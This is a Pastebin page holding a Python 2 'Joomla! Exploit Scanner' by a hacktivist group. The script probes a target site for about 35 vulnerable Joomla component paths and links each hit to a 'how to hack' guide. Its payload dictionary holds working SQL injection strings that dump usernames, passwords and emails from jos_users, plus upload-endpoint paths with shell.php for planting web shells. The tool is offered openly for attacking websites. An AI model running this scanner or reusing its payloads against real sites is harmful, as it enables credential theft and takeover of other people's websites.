API tools faq
paste
Advertisement
CrimeCrew

Joomla! Exploit Scanner[Version 1.0 Beta] [Turkish]

CrimeCrew
Sep 25th, 2015
422
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.34 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. #Joomla Exploit Scanner Version 1.0 Beta
  3. #Coded by CrimeCrew
  4. #http://hacktivizmgunceleri.blogspot.com.tr/
  5. #https://www.facebook.com/yasir.coskun.Real
  6. #https://www.facebook.com/groups/421380114709514/
  7. #CrimeCrew
  8. import sys
  9. import urllib2
  10. import re
  11. import time
  12. import httplib
  13. import random
  14.  
  15.  
  16. #Bad HTTP Responses
  17. BAD_RESP = [400,401,404]
  18.  
  19. def main(path):
  20. print "[#] Test Ediliyor:",host.split("/",1)[1]+path
  21. try:
  22. h = httplib.HTTP(host.split("/",1)[0])
  23. h.putrequest("HEAD", "/"+host.split("/",1)[1]+path)
  24. h.putheader("Host", host.split("/",1)[0])
  25. h.endheaders()
  26. resp, reason, headers = h.getreply()
  27. return resp, reason, headers.get("Server")
  28. except(), msg:
  29. print "Error Occurred:",msg
  30. pass
  31.  
  32. def timer():
  33. now = time.localtime(time.time())
  34. return time.asctime(now)
  35.  
  36. def slowprint(s):
  37. for c in s + '\n':
  38. sys.stdout.write(c)
  39. sys.stdout.flush() # defeat buffering
  40. time.sleep(8./90)
  41.  
  42. print "\n Joomla! Exploit Scanner[Version 1.0 Beta]"
  43. print " Coder By CrimeCrew"
  44. print " www.HacktivizmGunceleri.Blogspot.Com.Tr"
  45.  
  46.  
  47. xpls = { "images/artforms/attachedfiles/" : ["com_artforms","http://goo.gl/MiQMIu"],"index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1" : ["com_fabrik","http://goo.gl/mZ3Qsl"] , "index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,2,concat%28username,0x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--" : ["com_idoblog","http://goo.gl/gAFm9F"], "index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--" : ["com_ignitegallery","http://goo.gl/pgbM6r"], "administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=shell.php" : ["com_maian15","http://goo.gl/NQWtR6"], "administrator/components/com_maianmedia/charts/php-ofc-library/ofc_upload_image.php?name=shell.php" : ["com_maianmedia","http://goo.gl/vlxGt0"] , "index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=" : ["com_media","http://goo.gl/y2rLm7"], "administrator/components/com_redmystic/chart/tmp-upload-images/" : ["com_redmystic","http://goo.gl/REjCvg"], "index.php?option=com_users&view=registration" : ["com_user","http://goo.gl/Bp0IjM"], "index.php?option=com_jce" : ["JCE","http://goo.gl/hVp8Hu"] , "index.php?option=com_user&view=reset&layout=confirm" : ["com_user 2","http://goo.gl/zoTbrf"] , "index.php?option=com_shohada&view=shohada" : ["com_shohada","http://goo.gl/90eMKC"], "index.php?option=com_smartformer" : ["com_smartformer","http://goo.gl/x4m3vA"], "index.php?option=com_garyscookbook&func=newItem" : ["com_garyscookbook","http://goo.gl/e6GAeu"],"index.php/component/osproperty/?task=agent_register" : ["com_osproperty","http://goo.gl/dlKu19"], "index.php?option=com_acymailing&gtask=archive&listid=" : ["com_acymailing [SQLi]","http://goo.gl/2rTCxA"], "index.php?option=com_extplorer&action=show_error&dir=" : ["com_extplorer","http://goo.gl/8He9vM"] , "index.php?option=com_xmap&tmpl=component&Itemid=999&view=" : ["com_xmap" , "http://goo.gl/gTOxZE"] , "index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/*" : ["com_content [SQLi]" , "http://goo.gl/nmzTmE"] , "/index.php?option=com_flippingbook&Itemid=28&book_id=nullunionselectnull,concat(username,0x3e,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,nullfromjos_users/*" : ["com_flippingbook [SQLi]" , "http://goo.gl/fAZvqC"] , "index.php?option=com_phocagallery&view=categories&Itemid=" : ["com_phocagallery" , "http://goo.gl/j2N3Qo"] , "index.php?option=com_lyftenbloggie&author=62+union+select+1,concat_ws(0x3a,username,password),3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+jos_users--" : ["com_lyftenbloggie [SQLi]" , "http://goo.gl/0EENFD"] , "index.php?option=com_wrapper&view=wrapper&Itemid=":["com_wrapper","http://goo.gl/l1ldl1"] , "index.php?option=com_fireboard&Itemid=":["com_fireboard","http://goo.gl/6jfAzQ"], "j/index.php?option=com_mailto&tmpl=component&template=beez_20&link=":["com_mailto [SPAM]","http://goo.gl/KS9uZO"], "/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc" : ["com_simpleimageupload","http://goo.gl/VcjDSC"], "/administrator/components/com_simplephotogallery/lib/uploadFile.php" : ["com_simplephotogallery","http://goo.gl/LYt0HU"], "/components/com_creativecontactform/fileupload/index.php" : ["com_creativecontactform","http://goo.gl/zqkRPs"],"/index.php?option=com_jfuploader&Itemid=|/index.php?option=com_jfuploader&Itemid=" : ["com_jfuploader","http://goo.gl/IMk9r2"],"/components/com_pinboard/|/components/com_pinboard/popup/popup.php?option=showupload" : ["com_pinboard","http://goo.gl/gBa5X1"],"/components/com_agora/" : ["com_agora","http://goo.gl/e2hLrd"],"/administrator/components/com_joomla_flash_uploader/" : ["com_joomla_flash_uploader","http://goo.gl/El7Guu"],"/components/com_simpleboard/" : ["SimpleBoard","http://goo.gl/3WzjMP"],"/components/com_joomlaboard/" : ["JoomlaBoard","http://goo.gl/HoXXfR"],"/components/com_expose/uploadimg.php" : ["com_expose","http://goo.gl/O80vlp"],}
  48.  
  49. if len(sys.argv) != 2:
  50. print "\n Usage: joomla.py <site>"
  51. print " Example: joomla.py www.site.com/\n"
  52. sys.exit(1)
  53.  
  54. host = sys.argv[1].replace("http://","").rsplit("/",1)[0]
  55. if host[-1] != "/":
  56. host = host+"/"
  57.  
  58. print "\n[#] Hedef:",host
  59. print "[#] Exploit Sayisi:",len(xpls)
  60.  
  61. print "[#] Exploit Taraniyor"
  62. for xpl,(poc,expl) in xpls.items():
  63. resp,reason,server = main(xpl)
  64. if resp not in BAD_RESP:
  65. print ""
  66. print "[#] Sonuc:",resp, reason
  67. print "[#] Exploit:",poc
  68. print "[#] Nasil Hacklenir:",expl
  69. print "################################################################################"
  70. else:
  71. print ""
  72. print "[-] Sonuc:",resp, reason
  73. print "================================================================================"
  74. print "[-] Done"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!